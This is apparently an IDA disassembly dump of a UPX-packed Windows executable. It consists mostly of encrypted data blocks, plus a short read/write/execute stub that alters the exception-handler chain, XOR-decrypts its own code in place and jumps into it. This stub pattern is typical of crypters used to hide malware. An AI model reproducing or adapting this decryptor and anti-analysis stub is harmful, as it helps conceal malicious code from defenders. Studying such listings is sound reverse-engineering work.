dd 0B6D10AEBh, 0B12725F2h, 0ECC0351Bh, 0D0A7D7A7h, 0F9167477h
dd 0EB0F1BEFh, 0C429A84Ch, 0AB973CC0h, 0B6E8D170h, 6C7BF9CAh
dd 7E96E461h, 0A38EAF00h, 348C596Eh, 4BEB6308h, 0EAFE7DB0h
dd 7039A9ECh, 21B5F477h, 7E0184F0h, 9CE1CACFh, 21844513h
dd 0E3F1D0DBh, 0F7EC680Bh, 9525C6D9h, 0E1B76D71h, 4A8D889Dh
dd 0E623A176h, 293EBC21h, 1109E92Bh, 0D87BA48Dh, 788F0D7Ah
dd 3FA2EE79h, 2ACB4E29h, 0C9DE5DA9h, 178D5777h, 0F028ADCAh
dd 192D2705h, 13456B9Ah, 7043C194h, 131B9BEFh, 0BE35689Ch
dd 1CCF4724h, 0D0EDB361h, 0A292124Eh, 9E02FED4h, 7D33B555h
dd 0DD7073E1h, 8663DFA3h, 566DCCADh, 8EDAE42Fh, 0BC89B866h
dd 0F77D0F0Eh, 2A870679h, 0DDF1704Dh, 967CE51Bh, 7647CB15h
dd 2DD44093h, 0C35CEA86h, 53418107h, 5017992Bh, 0C7AD1BD6h
dd 0B1C44670h, 9AB031B7h, 0E26E851Eh, 8F16A442h, 2C2AF316h
dd 0FF7F9A9Dh, 237B4E3h, 0FE7D5183h, 86AD31D8h, 5E93328Fh
dd 8CFB51B6h, 5728923Eh, 0C210EBD4h, 0CFD99F73h, 221FE506h
dd 4056D44Fh, 0B7F0B2C1h, 75BC17B5h, 0BED4987Ch, 1E4A4022h
dd 0C6EB7456h, 6C7E8F4Bh, 0FC3FA014h, 93A10D8Eh, 3075EDE4h
dd 640F4B3Ah, 0E178F9FBh, 7FA63A81h, 12D82D88h, 4ACA490Fh
dd 0E0CEFAA2h, 0B7379652h, 6F6FF229h, 7068D7E4h, 533CB4C9h
dd 190689D8h, 1DEA6EB3h, 58931E88h, 53E8F687h, 215701FEh
dd 0D8AE0741h, 9C5AD0A4h, 0B7962C6Fh, 933E8C8Ch, 4459D7BCh
dd 0A039F648h, 1F70F21Fh, 0D9AEA550h, 0AFC44316h, 8D53F657h
dd 1CADC48h, 0E2B8F7CBh, 79BB217Ah, 6049F7B5h, 0B136E4DFh
dd 5855345Ah, 0A7EE93EAh, 8670B00Dh, 3CC18DA5h, 0D4E8669Eh
dd 0CF6A813Ch, 5F1D9B71h, 0B6C7BDE0h, 3D63FB75h, 0DC62B235h
dd 0EF001797h, 8D940C93h, 86D5B086h, 2059571Ah, 0D10D8145h
dd 0F966D831h, 0A6D8A310h, 2D72EEF7h, 6D284E51h, 9E28F6F8h
dd 4CBD7256h, 963BD3FEh, 0EAC87733h, 0C271A1B1h, 0E8FD2FCBh
dd 3896F36Ah, 1146EAC9h, 0AAD834CDh, 0B868D692h, 6C830092h
dd 8756A263h, 15B73709h, 0C95F4F6Ah, 0DC84740Eh, 0A406855Bh
dd 27740A8Bh, 706ABABEh, 6B4A4057h, 18F9F0F2h, 0FD4E08E1h
dd 42AB5EA8h, 27E23398h, 0F3514364h, 0E15B247Ah, 0FC680EA7h
dd 654EFA1Bh, 0C3A4C1ECh, 62CC34EBh, 17F7DEC0h, 73944CC3h
dd 94AD6289h, 0B5854EAAh, 53D1EFEBh, 0A2748D50h, 68AF1166h
dd 0AA3583A6h, 5CE5F594h, 276BD992h, 17332F54h, 0B0A12FDCh
dd 969551B8h, 0B0565B28h, 0EF1091BCh, 84BC019Eh, 98249256h
dd 1B11CA1Fh, 2F0A88ACh, 5E1FA3C5h, 7A900E89h, 10547E7Ch
dd 0B0F5516Fh, 0E1FACBCDh, 6B06787Dh, 1248710h, 14D05501h
dd 0CAB5F318h, 2CE06A49h, 380CEFEh, 0D29B73EBh, 0E20CB56h
dd 31CF7E0Bh, 0E5C71FB9h, 0F2E34357h, 0A74CC21h, 0E542274h
dd 0BBDDD295h, 585FC3C4h, 73E0DC51h, 0DE97DCA7h, 87DC8BEFh
dd 5126581Bh, 0DFC358CFh, 0D46E09EAh, 10A1A64Bh, 2FD63EB1h
dd 0C35EEC85h, 0D7F2CB9Ah, 7DA43C9Fh, 0ACB57974h, 26E2B691h
dd 0CED34C52h, 0C78AF1DBh, 2FB5965Bh, 0E4D11A47h, 252E4912h
dd 338E789h, 3CD55287h, 0A2AA8810h, 5CE9383Ah, 8EF953B0h
dd 0AAC8AF40h, 913DAC61h, 6240C11Bh, 6807DFEAh, 2E3DBEDAh
dd 7241C2AFh, 5BE260BAh, 0C1A916D4h, 0E897114Dh, 0BD9E0062h
dd 8D920438h, 907ED311h, 7443D80Bh, 6E33A0CAh, 3A1085E0h
dd 151898A4h, 0E0F045B4h, 0DDD65471h, 0C4A9287Dh, 0B3B6394Ah
dd 886D1E26h, 7469FC1Ah, 535FF2D4h, 5730B8C7h, 3903BAD0h
dd 2CFE66BEh, 0E5C354A1h, 0C2CE5A69h, 0A7B92778h, 8095032Ah
dd 9F7EFC1Fh, 6B4CD117h, 5B01DAF7h, 2632B5DCh, 301F80A7h
dd 36CD7C8Fh, 95D85995h, 0E4800A44h, 8EB21E65h, 85933411h
dd 6E66FC1Ah, 4C6CDAE4h, 5A2FA7F5h, 0C3A97C1h, 0CF38DA5h
dd 0E1CA6E85h, 0F0DF4674h, 0C295134Fh, 0A785054Ch, 0A404F132h
dd 6F78EF10h, 5755F0FFh, 3E57D3D1h, 0ED22BEBFh, 1FB8561h
dd 0E3CF5C9Ah, 0C2B4513Eh
dd 0B4B63759h, 0B19D5D27h, 0B40EE207h, 3462E432h, 5A2BACFDh
dd 233ABADEh, 2729ADC3h, 37ED33B6h, 0B8FE67B0h, 0C1A33F3Ch
dd 0C4D71641h, 0E9FE9505h, 8544976Bh, 2E146068h, 57CA0B9Fh
dd 526AD8ACh, 47E4962Bh, 60611EDFh, 0C9864D15h, 0AB61D83Bh
dd 80EE5D6Ah, 8126BBF7h, 30A2C75Fh, 0B4BA170h, 69786A24h
dd 2AFFF2F3h, 112A5ADCh, 0D02FA55Ch, 22C4733Dh, 0F8F735AAh
dd 0A5718D4Ah, 5C1D9Fh, 0FA2C1A84h, 0BF162D56h, 7C764836h
dd 6614ACCDh, 14661982h, 9C83187Ah, 0BFE9309Dh, 3AA1133Dh
dd 0ED01805Ch, 295FDC3Dh, 217BF9CCh, 1103455Dh, 9566EB8Ch
dd 72E212A3h, 72DEC9A2h, 3342C3F2h, 0C1E77C25h, 0DE85B0C6h
dd 0FCE35AA1h, 4226A478h, 641EFCD4h, 918F4FFh, 0CA88F58Ah
dd 7AA23AB0h, 6A547D14h, 0B0CCAEE8h, 98B46032h, 0D4C82808h
dd 4D5AD046h, 6AA45082h, 0DD4CFAB6h, 4F67E5BCh, 18F273A6h
dd 0E3E97585h, 5FE73646h, 8BFB5DB7h, 0CF6EE33Dh, 0FE05B472h
dd 35AD1343h, 0AC3B8995h, 0F7DF323h, 0CC8EBEC0h, 74BC20AAh
dd 8FA34D65h, 1F4C4011h, 0C5EB4367h, 0ED48F91Eh, 130FBE49h
dd 0EAD55BDCh, 0BFC004F0h, 4960EE90h, 0F1DE7A9Ah, 7E9624C5h
dd 0B9E0BA8Dh, 0E09A492Bh, 0CF8E625Ch, 0EAFC1503h, 90E6176Ch
dd 1F049997h, 4C150D25h, 0D0E76598h, 3C8533F5h, 3C2D189Ah
dd 0A48A199Bh, 0EF840572h, 4F113F10h, 0F538AC49h, 2B65E2Eh
dd 0EF3E8CBBh, 7374F92Fh, 4F9CF2C4h, 8770F22Ch, 0A3B85577h
dd 0E2418415h, 9FDE6D25h, 0CCB281Fh, 0ED639Bh, 0C612E47h
dd 671EC6AAh, 0A38BD5EBh, 0A081033Ch, 0B28C5B6Ch, 0C2CB6404h
dd 4A12A42Bh, 562099C5h, 0EE319519h, 5C6AFF39h, 0A7BA7CBAh
dd 3C62FEDCh, 73CBAECh, 20D95788h, 0A6CAB40Ch, 32423C3Eh
dd 0C2E77C48h, 0A8EE9885h, 0F807622Bh, 5A75A479h, 7C00E8DFh
dd 0A18F4E4h, 0F588F58Bh, 7BA23A93h, 96AD2715h, 0E28F1518h
dd 0ADB71456h, 0A69E0F22h, 97E9C469h, 1C01858Eh, 19F9470Eh
dd 3867D59Ch, 6B82001Ah, 799D71BBh, 919D7B9Dh, 244DD23h
dd 5AEB5A21h, 0C22E73E4h, 5B72C873h, 0C222C72h, 84D5D497h
dd 81E462CDh, 258C3AC3h, 0C6A64FA0h, 0ABC32840h, 1524DA2Dh
dd 1E0FD9A0h, 0CEB20D9Ch, 162A9868h, 0B82DC8E3h, 0B560DEA2h
dd 5451605Eh, 7F9AFCE6h, 0C9E72F01h, 86810A53h, 9CA04D05h
dd 7E017D1Eh, 629BD1Ch, 2033DA14h, 8FC2CDA1h, 545AF019h
dd 0B2388E8Fh, 62A02EDBh, 5A45CB3Ch, 0C0D45FCFh, 95A73A42h
dd 0A24DC914h, 5C6FE559h, 5BAB4391h, 0C159E781h, 6BF0FD05h
dd 0EA8F0DE2h, 94AA2D93h, 4F71CE16h, 93DE6D29h, 0CF01CAC1h
dd 0F9FB9157h, 99D15370h, 4633A26h, 0CA6BE2B5h, 687FFFDFh
dd 820AF46Bh, 0F6E03305h, 0B9CE4C21h, 0FE35F2C4h, 2B838166h
dd 91D9AE0h, 49EC3DDAh, 0A8AC83A4h, 575EC643h, 7D0C75Ch
dd 9E2C4AF9h, 3D413D0Fh, 0C3E87DB3h, 637193AEh, 0F93CABF2h
dd 9E0ED07Ah, 1D625611h, 0D2A28BAEh, 6148DC21h, 0F89CD166h
dd 97AE2D77h, 39C40792h, 42D29E34h, 0D8DCE9CAh, 2D92536Ah
dd 1C3280A9h, 3627CBF4h, 0C497E4D2h, 6CB32B26h, 8861E46Dh
dd 0A2B9578Dh, 285FC224h, 0D8DC4BB1h, 0A0549530h, 27C40A8Bh
dd 0E7B9BABEh, 401750A7h, 0E6FFF0C2h, 76BD2B6Dh, 90402E49h
dd 0C43DBEE4h, 0C7DC5BBAh, 6B105E17h, 244AB50h, 2701CCEBh
dd 8FFB4998h, 0FA61EF92h, 939E12CDh, 151AEA18h, 9B8110A9h
dd 0A2A34A77h, 83E56438h, 1D6A8100h, 8A1AA844h, 0AC2197CCh
dd 0B7EB137h, 0E364B9BCh, 54C28FDDh, 8341DEE6h, 0B4BA700Fh
dd 8BC75662h, 0F8AB6540h, 0F8E80856h, 402C42B9h, 3B1BF999h
dd 0C80AEA53h, 6F5EDC7Bh, 7A8CE6E1h, 0BB8E29FCh, 9EE53C21h
dd 0F1FF7012h, 0C8DC5D68h, 7931EA50h, 115C88A2h, 7B0387D6h
dd 0B032E396h, 59AAE745h, 285F98EBh, 0F5B53406h, 0E9981E21h
dd 0FF18FDC3h, 7D888267h, 0A2E8943h, 3FDAB7E1h, 6F591BCEh
dd 586FE857h, 17AF2EDAh, 71F223FFh, 99952785h, 0C81DDB2Bh
dd 0B7F89916h, 0FA0D8C69h, 34EC1BF6h, 7D14C1A5h, 62AF4950h
dd 0A2FCF7F9h, 0C819469Ah, 989F06D0h, 0A6FBED99h, 43E36205h
dd 0D9D052DDh, 6ED6BD6Bh, 4D65E085h, 12A35960h, 0AAEAE789h
dd 0FCAB7CD4h, 3D12E364h, 0A3891325h, 10215F95h, 318D7C35h
dd 0BF870B1h, 0ED35D214h, 294A3686h, 8DD33C42h, 0E1FE3FE8h
dd 77BE27F1h, 652E830Ah, 5290FBFFh, 0F8F7BDBAh, 8C4AF64Ah
dd 0FF11A070h, 2844800Bh, 0CD47C5ECh, 7C487926h, 48C07BCDh
dd 819826C5h, 19752077h, 0B7FC6B8Ch, 0D2E66539h, 0C02EFA92h
dd 0EE1B995Eh, 0DEC94A80h, 3B550DFFh, 78435F31h, 8FD105E7h
dd 0BB886167h, 5944B80Dh, 0C16DD127h, 59796F43h, 0F73AA76Dh
dd 0EE73A312h, 1B6A3307h, 4A9B5CACh, 5F765042h, 2A5124E1h
dd 0C5AF40ACh, 0B0AE447Dh, 9D205F32h, 0CCDFECB2h, 0F9969358h
dd 11B4A17Dh, 0BC4BC99Fh, 7F48D333h, 520C72D0h, 99C2AC5h
dd 0AF987693h, 0D0821E21h, 4015393Ch, 0F034A91Eh, 5E065F2h
dd 2438600Fh, 0C155B9A5h, 685ED90Ah, 361EF6DAh, 0DA614DFh
dd 2DCFC0E8h, 0C4DA5BEAh, 0F1BFF6CFh, 333D8D51h, 44786478h
dd 7F40A8C4h, 66686850h, 0F785F8F9h, 7DA539CDh, 1CBFEE7Ah
dd 0B3CA4B87h, 4B6DAA06h, 0E9CE531Fh, 6C48C63Ah, 1E3BB29Ah
dd 4DDA32CFh, 0D76AD893h, 3B010C14h, 1A01EEDh, 93946A8Fh
dd 0F55F9025h, 876CD578h, 263B875Bh, 0FFD46076h, 0ADB75D78h
dd 4269F9F6h, 0E448B948h, 778F17DEh, 53A9FACAh, 4C33B2E3h
dd 0E689D8A6h, 0EC3B777Ah, 714DAD2h, 4BA09D9Ch, 71FFC981h
dd 5B3E2A7h, 65563DA6h, 0DEA39638h, 65DD5B74h, 3484526Ah
dd 0A0E66A43h, 0D14A0B8Bh, 408D8E5h, 65BAA5CAh, 0E2A52FEAh
dd 0D0562A9Fh, 70B8289Ch, 0CF287831h, 2E343029h, 0C1D75690h
dd 5732B070h, 7A006191h, 210B8BC5h, 0F4CA4392h, 79F0139Fh
dd 637187A7h, 5690679Bh, 0C99181DCh, 9EFBAA63h, 0CBDDBD46h
dd 2E189238h, 442B95E3h, 6F31EADAh, 761FF797h, 0CA68E5E4h
dd 957DFF98h, 0D2A01867h, 0AFF4784Eh, 442E6CA6h, 95BC57C2h
dd 750ACA0Dh, 0F4DF6143h, 1678EEB1h, 19D2DB94h, 648E103Fh
dd 3BD8598Bh, 70BCA1F9h, 71F2BFEEh, 3A2519C4h, 0EE717BB8h
dd 0C8F0719Dh, 153C40AEh, 41ADC396h, 0A19F214Fh, 637BF9CAh
dd 0FE7B95B8h, 70B01F27h, 0B4CA4804h, 44D69C52h, 0DAD02EE4h
dd 2790F36Ch, 520A33E0h, 31CAC2FAh, 0D86AE8BBh, 0B0863F8Bh
dd 0D99B9F96h, 5C3F364Eh, 48D45326h, 0FAEE7B02h, 7007875Ch
dd 0F23A19Dh, 2B62FF66h, 43B853A5h, 23F5F2C4h, 58AF2DFFh
dd 472E27DAh, 46C44315h, 3621A3FFh, 0E431F544h, 0BD999166h
dd 9672088h, 373B07B1h, 48882187h, 2DF734CDh, 0D91C9EF9h
dd 75B3022Ah, 4732B261h, 0D3E7C9D2h, 0B99C0B55h, 0B1CAA41h
dd 1219EE14h, 0C1C438A3h, 0D2621442h, 71880657h, 0A2F09478h
dd 0F9363C3Eh, 2A095515h, 220E8E3Bh, 0B28AF72Dh, 1226C45Dh
dd 7ABF3473h, 0CB48A0AEh, 5067F572h, 6BE813E2h, 96ABAB44h
dd 14341118h, 0CE026182h, 0B9A4DEBDh, 90279B3Bh, 1CB3280Eh
dd 0BF2ACA9Dh, 0AF987827h, 8C1EE82Dh, 0DC7E412h, 0EBB43A42h
dd 0BA90DD33h, 5EC32915h, 0F205DBDEh, 2C665973h, 61B99ADh
dd 0CB7E9F2Eh, 0DFFAFF8Bh, 75BC248Bh, 0E3AF6FCEh, 0A38BC911h
dd 45CB182Ch, 6AF52C2Bh
dd 0CC21D1E6h, 1E68A97Dh, 3158096h, 68EBBA63h, 3C7976AFh
dd 51A1A965h, 95B02F31h, 4A37F598h, 83519CC8h, 14FE4D7Ch
dd 36330AF8h, 6F814D87h, 0C54FFD8Fh, 6440E92Eh, 54088ED6h
dd 7A02EDFh, 95947A99h, 0AA860227h, 0EC5B9242h, 908B773h
dd 200934E2h, 1D8B4391h, 0BB59E785h, 6E5EF350h, 563A80E0h
dd 6BAA18D6h, 9FEA70A3h, 5F210B31h, 0E5C85DC1h, 2E2434E4h
dd 0D92EACB1h, 3449C773h, 4F0EBFB5h, 415E104Eh, 73C218DAh
dd 0E631F20Ah, 3CCE7D35h, 1C6BA4FBh, 2E0D71A9h, 3908E3F5h
dd 3305758Ah, 4853FBA4h, 2BEF8AA2h, 3E50BFDh, 65C43181h
dd 5741C2CBh, 5F30525Fh, 360D8EB8h, 6F374B2h, 3ED88B1Bh
dd 3F7696ECh, 475DFE16h, 0C49096C8h, 96CEE1Ch, 0B3EAA7C7h
dd 9D7DCA29h, 46E25119h, 699A731Fh, 70159350h, 1D5AE6A1h
dd 0BC4D349Eh, 3688C7Ch, 0B516FE83h, 49E2CC4h, 9C393FCDh
dd 0E1ED6E78h, 1E6F684Ah, 0E4F6D5Eh, 72C9608Bh, 46C34571h
dd 41236D6Bh, 0EA99F0C2h, 768D2465h, 91B8CEF8h, 8C004113h
dd 0C7ECE32Eh, 0E11E7549h, 3F108F64h, 43A6A95Ah, 1F8BC8BCh
dd 37612731h, 65949AD5h, 0B9715E7h, 0C6811456h, 5B4A5096h
dd 0D1D54DD3h, 1310C1BBh, 3D8F991h, 1180h dup(0)
UPX2 ends
; Section 4. (virtual address 00024000)
; Virtual size : 00008000 ( 32768.)
; Section size in file : 00002800 ( 10240.)
; Offset to raw data for section: 00024000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_idata2 segment para public 'CODE' use32
assume cs:_idata2
;org 31444000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 80h dup(0)
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
public start
start proc near
push ebp
mov ebp, esp
call sub_3144421C
call sub_31444288
push dword ptr fs:0
pop ebp
add ebp, 8
jmp near ptr 314D0805h
start endp
; =============== S U B R O U T I N E =======================================
sub_3144421C proc near ; CODE XREF: start+3�p
push dword ptr fs:0
mov fs:0, esp
xor eax, eax
push 1
push eax
push eax
push eax
push 80000000h
push 80000000h
push 2
push eax
push eax
push 80000000h
push eax
call $+5
pop ebx
sub ebx, 0FFFFFFB9h
xor edi, edi
or edi, 243Ch
mov esi, 12h
push ebx
loc_31444263: ; CODE XREF: sub_3144421C+57�j
xchg al, [ebx]
xor ax, si
mov [ebx], al
add ebx, 1
sub edi, 1
cmp edi, 0
jnz short loc_31444263
pop ebx
mov esp, fs:0
pop dword ptr fs:0
leave
jmp ebx
sub_3144421C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_31444288 proc near ; CODE XREF: start+8�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_31444288 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 82h, 0FAh, 12h
dd 99121212h, 92E53616h, 12123639h, 92121212h, 3BBE8A9Bh
dd 4E991212h, 3F661636h, 0A29B4BEEh, 12123BA2h, 3BA6AA9Bh
dd 0AA921212h, 1212363Dh, 111F67FAh, 1236228Ah, 10499912h
dd 1AF921EDh, 36238A99h, 21ED1212h, 93874749h, 8916367Eh
dd 93121270h, 0EDE212F1h, 14FF93EDh, 99125202h, 9F16366Eh
dd 52262EA7h, 1212AB12h, 0B6E11212h, 465C6993h, 67617B7Ah
dd 2E51991Fh, 740A169Fh, 57422A93h, 0F9931A66h, 12121312h
dd 4299F067h, 99C1116Ah, 58993260h, 43E1110Ah, 93D111BFh
dd 5512ED6Ah, 9676677h, 42116A93h, 67717D60h, 156A9300h
dd 60767653h, 6A931B67h, 61617719h, 0F0176612h, 0D14F4BC5h
dd 99361E3Bh, 114B3660h, 16A51DE1h, 0E68995Ch, 2699E911h
dd 0FAE11195h, 1212121Eh, 617D7E51h, 7C735A77h, 12777E76h
dd 9BC4ED41h, 52272E97h, 121FFA12h, 60511212h, 77667377h
dd 7C776457h, 41125366h, 979BC4EDh, 12522752h, 12121FFAh
dd 66775512h, 6661735Eh, 7D606057h, 0ED411260h, 56979BC4h
dd 0FA125227h, 12121262h, 3366D297h, 5687ED42h, 97125227h
dd 9F0267D2h, 5203C097h, 0ED429812h, 12127CFAh, 0ED6EF912h
dd 52272E87h, 2397E512h, 12125226h, 66921212h, 27A79F0Ch
dd 99125226h, 0B616366Eh, 0A08F99B7h, 9912522Bh, 522BA4A7h
dd 0A8AF9912h, 4F12522Bh, 127848D1h, 12781278h, 137A1278h
dd 99121612h, 421278D6h, 0D6991E78h, 4644F0EDh, 1212214Dh
dd 0C8FADB21h, 9FEDEDEDh, 5203B387h, 43434012h, 5287ED42h
dd 91125227h, 98D132D6h, 304DABE0h, 2221212h, 0F0C41052h
dd 0DA59D1EBh, 252B7321h, 14C91FD0h, 0DDD63E78h, 6107F408h
dd 35CEC341h, 752B2AEBh, 0A415FBCCh, 99C306B2h, 0FCE0D66Bh
dd 0C3997F70h, 0AFF9638Dh, 4AE017AAh, 0AC5076B5h, 4F980F80h
dd 0CE039DBBh, 18D2272Bh, 10B606CDh, 0C487DFD0h, 9D16FE07h
dd 14EFFEFBh, 0F5CE764Ch, 5F327191h, 72E6BB4Fh, 4CA65267h
dd 6D9F13E4h, 5EE30EFh, 76B64B1Ch, 49A8836Fh, 55866077h
dd 0E832CF90h, 0CD734B29h, 0B05C4FF8h, 0E5D47304h, 4020AAFh
dd 9D93AB3Ch, 97D37387h, 38D9FC2Bh, 818A2F55h, 5449F00Ch
dd 39F28D2Ch, 551E3EE5h, 4A7FFF0h, 0BD36195Fh, 2B7DF21Bh
dd 9E8E8FB7h, 12F2E5BCh, 0D88B82ACh, 9912FD85h, 59F59837h
dd 0F9A0899h, 7581777Bh, 29E3B74Bh, 405E566Bh, 45D9EFE0h
dd 0A2A6BEECh, 64CE59Ch, 5B404DBh, 5182BE1Ah, 15B6CB98h
dd 894317A8h, 0E03EB60Bh, 213F4F40h, 0F3431F23h, 59785887h
dd 653E9BD4h, 0B1201FD4h, 8A9AC33Dh, 81F27662h, 35CF8355h
dd 744A3A9Fh, 674EFBCCh, 467206D8h, 85AB0371h, 11AF9730h
dd 691F8B5Ch, 23FD2896h, 9FCDBAB4h, 348505AAh, 0CDC66E50h
dd 9A1196D3h, 65CBC3F9h, 0F505DF90h, 62A9158Bh, 0A9623120h
dd 0B1DA0D14h, 0FEDA236Ch, 6DD333D9h, 0A874A98h, 0B65E53B3h
dd 1D7B239h, 4CB60B29h, 4F2A0423h, 0D6EEA376h, 210F373Dh
dd 9491BACh, 266DD9FBh, 0D06AF68Fh, 41359F10h, 0C893247Dh
dd 0E222B7BBh, 0F57BEB51h, 0C0EAD0E0h, 0DE44FE83h, 0BC798718h
dd 455EE6BCh, 1E2B8F4Fh, 0FD45E259h, 150FDCE8h, 0F6AE2301h
dd 208B7049h, 7EF05EE3h, 6BBAE7F8h, 2881CC39h, 0B1BC11ADh
dd 7719E03Ch, 0D63B4148h, 948DC7E4h, 821A85A3h, 0AD0C6C35h
dd 4C3F5F72h, 59E86BBh, 51EAA3C9h, 0F0E2409Ch, 76BC5AACh
dd 7E08DC0Bh, 0E1F74B8Dh, 6BC69B2Ch, 5D552AD3h, 0C9DAC12Fh
dd 4AA8B4B6h, 13FE2B96h, 62A27761h, 0BECEE998h, 291AC5A4h
dd 6526FB8Ch, 0EB2347B2h, 3ACE5D8Eh, 519F9FA5h, 0F975D35Ch
dd 20CCBF28h, 41A5E3B4h, 6DF10FAAh, 0CDEC1B86h, 73806552h
dd 4C30DB44h, 7160DF90h, 0CDA981EDh, 9C86A237h, 0ACD14354h
dd 85D590A5h, 0D219466Bh, 69327215h, 0F1E713E4h, 5A6A3FFAh
dd 7C13B8F3h, 49D297C5h, 196B2E74h, 9E3A8F94h, 6DD3964Ch
dd 8B9267E0h, 0D022E6FBh, 27229F10h, 1116AB7Ch, 1C4998E7h
dd 0DC3C53A4h, 0A4F64696h, 8CF01E6Bh, 7897F234h, 0D0E18364h
dd 916ACAF8h, 883A8E55h, 9DD257A8h, 0EAC4435Eh, 14161ABFh
dd 8D83DB2Ch, 0F6D92E7h, 0F32831AEh, 0F0E08B9Bh, 1DC7836Eh
dd 4CB1B748h, 6CA6D0h, 0E828BFC7h, 0C80A52BAh, 0AFB2227Fh
dd 309206DBh, 9561BF30h, 2D609DCAh, 1CBD40FEh, 0D52E1624h
dd 0B6AA8B83h, 38FA0ED3h, 5978A738h, 0F0C1F1EEh, 0B10A2AA0h
dd 0DD970345h, 889E008h, 61EA8FDDh, 0ED8F5037h, 5E26BBB9h
dd 85D7842Eh, 0C59E13D2h, 84552864h, 3DB6BEECh, 157617EDh
dd 91D060F2h, 0D585E1B2h, 0CDEC53C8h, 8C2D4D52h, 25BE86ECh
dd 0AD7E1F15h, 996B032Fh, 605137C8h, 0CCBEA085h, 41EC53A5h
dd 0ACCECE4Ch, 793F6959h, 0D50A43A4h, 813A6EA6h, 9523B44Fh
dd 8CC2D71Dh, 5A9AFAB4h, 691EBB7Fh, 0BB7A9E23h, 757A27B8h
dd 0B6418CF9h, 4F60AAFh, 0C5FDAB3Ch, 680A3309h, 4A1903D4h
dd 81AF1375h, 1643920Ch, 707F78A7h, 1D468B64h, 910331B0h
dd 0BD7B6EDCh, 0C98256E8h, 15AE6334h, 21FA8F40h, 1E508A6Ch
dd 0AC1A7247h, 0FCD53384h, 844ADBBCh, 0DE3889C7h, 5A83F514h
dd 186F8DF1h, 0E3158BC5h, 0D9055EA6h, 0CAE51B6Bh, 6C88CC16h
dd 519FCB02h, 0F42B8F0h, 892C72C4h, 0B40B51B7h, 88FC2A74h
dd 0D87FE40h, 3877D53Bh, 0C7896F0h, 0D0077ABCh, 0B3FF5B8Ch
dd 0AAA2366Fh, 41AFE626h, 2E68FF05h, 1E559EEFh, 0CB310799h
dd 0A0EA3281h, 7EC71A62h, 55A2EE28h, 2D63B21Ah, 0F05CA0B4h
dd 0F51F7BA1h, 0ACE32984h, 6B91675Ch, 408AD221h, 1D65B0C4h
dd 0ED3A8ED4h, 0C73105FBh, 9DFD3375h, 44DA1B4Fh, 7992D234h
dd 1857B5F0h, 0EC1813C0h, 0B83E5A9Ch, 92E22E71h, 7DB1EE7Bh
dd 3CBACE11h, 263AAAEDh, 0E4006FC9h, 0ADD34294h, 87D70170h
dd 42AFEB25h, 3851AB3Dh, 54BB1FCh, 0CF2750B1h, 0A4DD2F85h
dd 81CF3D78h, 549BD33Dh, 2059D301h, 0F545B2C4h, 0F51367A9h
dd 0A5E63989h, 52AE2251h, 44AEFB25h, 2440AB01h, 0F81C82D4h
dd 0A53F56A9h, 0A5FE3A57h, 4DA60659h, 688AC329h, 16B8494h
dd 0F2288AF6h, 0AD0854A5h, 0AFC6225Fh, 6CADE141h, 29AFD11Fh
dd 127ACBDDh, 0E00E73C9h, 0A70F5196h, 0ACBA0E79h, 6490EB4Dh
dd 3F5DD01Dh, 529AC2h, 0D43A50D0h, 0B1FF6D92h, 99C33A6Dh
dd 52A0EA24h, 3155AF21h, 1F7695E9h, 0CA1764B7h, 0B7CE5397h
dd 62CF1C5Fh, 7BC4B82Fh, 3D71A501h, 0FA5CB3B4h, 0D2096AA3h
dd 0A8C869DFh, 4AD21340h, 4CB8C721h, 54BBAFCh, 0FF3F99C8h
dd 0DA0743BDh, 90DD4355h, 6DB32954h, 408FEF29h, 1561C7FDh
dd 852E76C1h, 0A51946A3h, 94E22679h, 6696F245h, 3082CA32h
dd 457A6D4h, 0E0284EACh, 0B0C45799h, 83F10461h, 54A6F616h
dd 2F7FFD7Ch, 54382FCh, 0DA226F95h, 0B3CD2F83h, 0ABC30F65h
dd 3997EB31h, 215FA72Ah, 0E5598ADAh, 0CB1F798Ch, 0AEE73B81h
dd 7AFA1051h, 2194EA2Bh, 3F45AF22h, 0FC2686DDh, 0C0125A82h
dd 0B2FE1110h, 69B70E4Eh, 4690E72Dh, 67DA6F7h, 0C22EA1A0h
dd 0D9075EBEh, 96C0177Dh, 76ADF647h, 1FEAC735h, 184488E8h
dd 0DA2763C9h, 0BC1A4091h, 0AFBA216Fh, 7DA7D658h, 2E77CE2Eh
dd 6D95CBh, 0DE236BB3h, 0A9D82B92h, 87C70747h, 50A2EA12h
dd 0E6EE160h, 3D489EFCh, 0DC1168AAh, 0AACA2097h, 11C41A5Bh
dd 4FA6FF12h, 2A67A307h
dd 0E747B5C0h, 0CD1B7AB4h, 0A2EB3EA1h, 57D21E4Ah, 4C8CE430h
dd 185CBAE4h, 0FC239FCEh, 0C4077AA4h, 0F5F7317Bh, 54B61B72h
dd 4285D222h, 0D61A2FCh, 0E2307AD6h, 0BF2B50A4h, 89E5226Fh
dd 6EACFE5Ah, 14BDF474h, 135BBBD3h, 8D366ED8h, 0AAFD4B9Bh
dd 86D10061h, 31BEFA3Bh, 3378C41Fh, 695694EDh, 0DD3A66B3h
dd 0A3EE5C8Fh, 80C71575h, 5C80873Dh, 361EA507h, 914E91D5h
dd 0D61564AFh, 8082238Dh, 67CB175Ah, 628EEA2Eh, 2875B400h
dd 0FD3C86F0h, 0EC7E56A8h, 83EF2B7Eh, 5AA20E52h, 46A1C32Dh
dd 166BADFAh, 0D23E8AD4h, 0C8125AB8h, 8DDC0E18h, 60B0E141h
dd 349AF004h, 34368AF2h, 0FB2763C6h, 9A1A469Ah, 0B4D42A70h
dd 0D87F75Eh, 3C66C931h, 115B9DF6h, 0D52B7A82h, 0B8FA42BAh
dd 0BFE63608h, 687D315h, 0D5E8152h, 874FBC0h, 0D61E44BFh
dd 0A0D53697h, 74F87F49h, 5886C43Bh, 30679C06h, 956F9BF1h
dd 0F01D6A92h, 0B4F43E99h, 6CBE066Eh, 6486F621h, 166F8D90h
dd 0CB228EEFh, 0CC175BA9h, 0F5CF3B51h, 2ADF86A3h, 2D8EEA84h
dd 0F4DAC798h, 0EF5D37E8h, 806F55F0h, 0F8DC184Ch, 82925BA3h
